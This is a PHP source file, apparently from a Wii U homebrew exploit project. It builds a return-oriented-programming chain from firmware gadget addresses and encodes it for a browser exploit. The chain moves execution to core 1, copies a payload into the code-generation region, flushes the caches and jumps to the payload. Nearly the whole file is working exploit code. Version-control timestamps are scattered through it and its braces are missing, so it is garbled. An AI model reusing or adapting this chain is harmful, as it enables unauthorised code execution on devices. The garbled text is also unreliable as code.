2015-11-22 13:08:09 -05:00
< ? php
if ( ! isset ( $sysver )) $sysver = - 1 ;
if ( isset ( $_REQUEST [ 'sysver' ]))
if ( $_REQUEST [ 'sysver' ] === " 532 " )
$sysver = 532 ;
else if ( $_REQUEST [ 'sysver' ] === " 550 " )
$sysver = 550 ;
if ( $sysver ===- 1 ) die ( " The system-version must be specified via an URL parameter. " );
require_once ( " wiiuhaxx_rop_sysver_ $sysver .php " );
$ropchainselect = - 1 ;
if ( $ropchainselect == - 1 )
$ropchainselect = 1 ;
if ( ! isset ( $generatebinrop )) $generatebinrop = 0 ;
Documentation for the addrs loaded from the above :
$ROP_POPJUMPLR_STACK12 Load LR from stackreg + 12 , add stackreg with 8 , then jump to LR .
$ROP_POPJUMPLR_STACK20 Add stackreg with 16 , load LR from stackreg + 4 then jump to LR .
$ROP_CALLFUNC Call the code with the address stored in r27 , with : r3 = r29 , r4 = r31 , r5 = r25 , r6 = r24 , r7 = r28 . Then once it returns from that code : r3 = r29 . Load r20 .. r31 from the data starting at stackreg + 8. Load LR from stackreg + 60 , add stackreg with 56 , then jump to LR .
$ROP_CALLR28_POP_R28_TO_R31 Set r4 to r31 , then call the code with the address stored in r28 . Load r28 .. r31 from the data starting at stackreg + 8. Load LR from stackreg + 28. Add stackreg with 24 , then jump to LR .
$ROP_POP_R28R29R30R31 Load r28 .. r31 from the data starting at stackreg + 8. Load LR from stackreg + 28 , add stackreg with 24 , then jump to LR .
$ROP_POP_R27 Load r27 from stackreg + 12. Load LR from stackreg + 36 , add stackreg with 32 , then jump to LR .
$ROP_POP_R24_TO_R31 Load r24 .. r31 with the data starting at stackreg + 16. Load LR from stackreg + 52. Add stackreg with 48 , then jump to LR .
$ROP_memcpy Address of " memcpy " in coreinit .
$ROP_DCFlushRange Address of " DCFlushRange " in coreinit . void DCFlushRange ( const void * addr , size_t length );
$ROP_ICInvalidateRange Address of " ICInvalidateRange " in coreinit . void ICInvalidateRange ( const void * addr , size_t length );
$ROP_OSSwitchSecCodeGenMode Address of " OSSwitchSecCodeGenMode " in coreinit . OSSwitchSecCodeGenMode ( bool execute )
2015-12-01 10:00:37 -05:00
$ROP_OSCodegenCopy Address of " OSCodegenCopy " in coreinit . u32 OSCodegenCopy ( dstaddr , srcaddr , size )
$ROP_OSGetCurrentThread Address of " OSGetCurrentThread " in coreinit . OSThread * OSGetCurrentThread ( void )
2015-11-22 13:08:09 -05:00
$ROP_OSSetThreadAffinity Address of " OSSetThreadAffinity " in coreinit . OSSetThreadAffinity ( OSThread * thread , u32 affinity )
$ROP_OSYieldThread Address of " OSYieldThread " in coreinit . OSYieldThread ( void )
2015-12-01 10:00:37 -05:00
$ROP_OSFatal Address of " OSFatal " in coreinit .
$ROP_Exit Address of " _Exit " in coreinit .
$ROP_OSScreenFlipBuffersEx Address of " OSScreenFlipBuffersEx " in coreinit .
$ROP_OSScreenClearBufferEx Address of " OSScreenClearBufferEx " in coreinit .
$ROP_OSDynLoad_Acquire Address of " OSDynLoad_Acquire " in coreinit .
$ROP_OSDynLoad_FindExport Address of " OSDynLoad_FindExport " in coreinit .
$ROP_os_snprintf Address of " __os_snprintf " in coreinit .
2015-11-22 13:08:09 -05:00
function genu32_unicode ( $value ) //This would need updated to support big-endian.
$hexstr = sprintf ( " %08x " , $value );
$outstr = " \ u " . substr ( $hexstr , 4 , 4 ) . " \ u " . substr ( $hexstr , 0 , 4 );
return $outstr ;
function genu32_unicode_jswrap ( $value )
$str = " \" " . genu32_unicode ( $value ) . " \" " ;
return $str ;
function ropchain_appendu32 ( $val )
global $ROPCHAIN , $generatebinrop ;
if ( $generatebinrop == 0 )
$ROPCHAIN .= genu32_unicode ( $val );
$ROPCHAIN .= pack ( " N* " , $val );
function generate_ropchain ()
global $ROPCHAIN , $generatebinrop , $ropchainselect ;
$ROPCHAIN = " " ;
if ( $generatebinrop == 0 ) $ROPCHAIN .= " \" " ;
if ( $ropchainselect == 1 )
generateropchain_type1 ();
if ( $generatebinrop == 0 ) $ROPCHAIN .= " \" " ;
function ropgen_pop_r24_to_r31 ( $inputregs )
global $ROP_POP_R24_TO_R31 ;
ropchain_appendu32 ( $ROP_POP_R24_TO_R31 );
ropchain_appendu32 ( 0x0 );
ropchain_appendu32 ( 0x0 );
for ( $i = 0 ; $i < ( 32 - 24 ); $i ++ ) ropchain_appendu32 ( $inputregs [ $i ]);
ropchain_appendu32 ( 0x0 );
2015-12-01 10:00:37 -05:00
function ropgen_callfunc ( $funcaddr , $r3 , $r4 , $r5 , $r6 , $r28 )
2015-11-22 13:08:09 -05:00
global $ROP_CALLR28_POP_R28_TO_R31 , $ROP_CALLFUNC ;
$inputregs = array ();
$inputregs [ 24 - 24 ] = $r6 ; //r24 / r6
$inputregs [ 25 - 24 ] = $r5 ; //r25 / r5
$inputregs [ 26 - 24 ] = 0x0 ; //r26
$inputregs [ 27 - 24 ] = $ROP_CALLR28_POP_R28_TO_R31 ; //r27
$inputregs [ 28 - 24 ] = $funcaddr ; //r28 / r7
$inputregs [ 29 - 24 ] = $r3 ; //r29 / r3
$inputregs [ 30 - 24 ] = 0x0 ; //r30
$inputregs [ 31 - 24 ] = $r4 ; //r31 / r4
ropgen_pop_r24_to_r31 ( $inputregs );
ropchain_appendu32 ( $ROP_CALLFUNC );
2015-12-01 10:00:37 -05:00
ropchain_appendu32 ( $r28 ); //r28
ropchain_appendu32 ( 0x0 ); //r29
ropchain_appendu32 ( 0x0 ); //r30
ropchain_appendu32 ( 0x0 ); //r31
ropchain_appendu32 ( 0x0 );
function ropgen_OSFatal ( $stringaddr )
global $ROP_OSFatal ;
ropgen_callfunc ( $ROP_OSFatal , $stringaddr , 0x0 , 0x0 , 0x0 , 0x0 );
function ropgen_Exit ()
global $ROP_Exit ;
ropchain_appendu32 ( $ROP_Exit );
function ropgen_OSScreenFlipBuffersEx ( $screenid )
global $ROP_OSScreenFlipBuffersEx ;
ropgen_callfunc ( $ROP_OSScreenFlipBuffersEx , $screenid , 0x0 , 0x0 , 0x0 , 0x0 );
function ropgen_OSScreenClearBufferEx ( $screenid , $color ) //Don't use any of this OSScreen stuff, this stuff just crashes since OSScreen wasn't initialized properly.
global $ROP_OSScreenClearBufferEx ;
ropgen_callfunc ( $ROP_OSScreenClearBufferEx , $screenid , $color , 0x0 , 0x0 , 0x0 );
function ropgen_colorfill ( $screenid , $r , $g , $b , $a )
ropgen_OSScreenClearBufferEx ( $screenid , ( $r << 24 ) | ( $g << 16 ) | ( $b << 8 ) | $a );
ropgen_OSScreenFlipBuffersEx ( $screenid );
function ropgen_OSCodegenCopy ( $dstaddr , $srcaddr , $size )
global $ROP_OSCodegenCopy ;
ropgen_callfunc ( $ROP_OSCodegenCopy , $dstaddr , $srcaddr , $size , 0x0 , 0x0 );
function ropgen_DCFlushRange ( $addr , $size )
global $ROP_DCFlushRange ;
ropgen_callfunc ( $ROP_DCFlushRange , $addr , $size , 0x0 , 0x0 , 0x0 );
function ropgen_ICInvalidateRange ( $addr , $size )
global $ROP_ICInvalidateRange ;
ropgen_callfunc ( $ROP_ICInvalidateRange , $addr , $size , 0x0 , 0x0 , 0x0 );
function ropgen_copycodebin_to_codegen ( $codegen_addr , $codebin_addr , $codebin_size )
ropgen_OSCodegenCopy ( $codegen_addr , $codebin_addr , $codebin_size );
ropgen_DCFlushRange ( $codegen_addr , $codebin_size );
ropgen_ICInvalidateRange ( $codegen_addr , $codebin_size );
function ropgen_switchto_core1 ()
global $ROP_OSGetCurrentThread , $ROP_OSSetThreadAffinity , $ROP_OSYieldThread , $ROP_CALLR28_POP_R28_TO_R31 ;
ropgen_callfunc ( $ROP_OSGetCurrentThread , 0x0 , 0x2 , 0x0 , 0x0 , $ROP_OSSetThreadAffinity ); //Set r3 to current OSThread* and setup r31 + the r28 value used by the below.
ropchain_appendu32 ( $ROP_CALLR28_POP_R28_TO_R31 ); //ROP_OSSetThreadAffinity(<output from the above call>, 0x2);
ropchain_appendu32 ( $ROP_OSYieldThread ); //r28
ropchain_appendu32 ( 0x0 ); //r29
ropchain_appendu32 ( 0x0 ); //r30
ropchain_appendu32 ( 0x0 ); //r31
ropchain_appendu32 ( 0x0 );
ropchain_appendu32 ( $ROP_CALLR28_POP_R28_TO_R31 );
2015-11-22 13:08:09 -05:00
ropchain_appendu32 ( 0x0 ); //r28
ropchain_appendu32 ( 0x0 ); //r29
ropchain_appendu32 ( 0x0 ); //r30
ropchain_appendu32 ( 0x0 ); //r31
ropchain_appendu32 ( 0x0 );
function generateropchain_type1 ()
2015-12-01 10:00:37 -05:00
global $ROP_OSFatal , $ROP_Exit , $ROP_OSDynLoad_Acquire , $ROP_OSDynLoad_FindExport , $ROP_os_snprintf ;
$payload_size = 0x20000 ; //Doesn't really matter if the actual payload data size in memory is smaller than this or not.
$payload_srcaddr = 0x14572D28 - 0x5000 ;
$codegen_addr = 0x01800000 ;
//ropgen_colorfill(0x1, 0xff, 0xff, 0x0, 0xff);//Color-fill the gamepad screen with yellow.
//ropchain_appendu32(0x80808080);//Trigger a crash.
//ropgen_OSFatal($codepayload_srcaddr);//OSFatal(<data from the haxx>);
ropgen_switchto_core1 ();
ropgen_copycodebin_to_codegen ( $codegen_addr , $payload_srcaddr , $payload_size );
//ropgen_colorfill(0x1, 0xff, 0xff, 0xff, 0xff);//Color-fill the gamepad screen with white.
$regs = array ();
$regs [ 24 - 24 ] = $ROP_OSFatal ; //r24
$regs [ 25 - 24 ] = $ROP_Exit ; //r25
$regs [ 26 - 24 ] = $ROP_OSDynLoad_Acquire ; //r26
$regs [ 27 - 24 ] = $ROP_OSDynLoad_FindExport ; //r27
$regs [ 28 - 24 ] = $ROP_os_snprintf ; //r28
$regs [ 29 - 24 ] = 0x0 ; //r29
$regs [ 30 - 24 ] = 0x0 ; //r30
$regs [ 31 - 24 ] = 0x0 ; //r31
ropgen_pop_r24_to_r31 ( $regs ); //Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
ropgen_Exit (); //Exit here since the below causes a crash.
ropchain_appendu32 ( $codegen_addr ); //Jump to the codegen area where the payload was written.
2015-11-22 13:08:09 -05:00